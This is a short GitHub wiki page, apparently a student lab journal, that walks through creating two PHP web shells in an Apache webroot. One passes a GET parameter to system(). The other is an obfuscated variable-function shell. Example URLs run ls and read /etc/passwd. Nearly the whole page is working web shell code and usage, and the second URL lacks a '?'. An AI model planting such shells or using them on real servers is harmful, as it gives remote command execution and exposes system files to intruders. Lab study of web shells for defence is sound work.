Lab 11: PHP Shells - squatchulator/Tech-Journal GitHub Wiki
PHP Shell that allows command exec. via GET request
-
Create a new file called
shell.phpin the Apache webroot (/var/www/html) -
Add to the file:
<?php system($_GET['cmd']); ?> -
Save and exit, and navigate to
http://server-ip/shell.php?cmd=lsto execute thelscommand -
Create a new file called
get.php -
Add to the file:
<?php $g=$_GET['_']; $e=$_GET['__']; $g($e); ?> -
Save and exit, and navigate to
http://server-ip/get.php_=system&__=cat%20/etc/passwd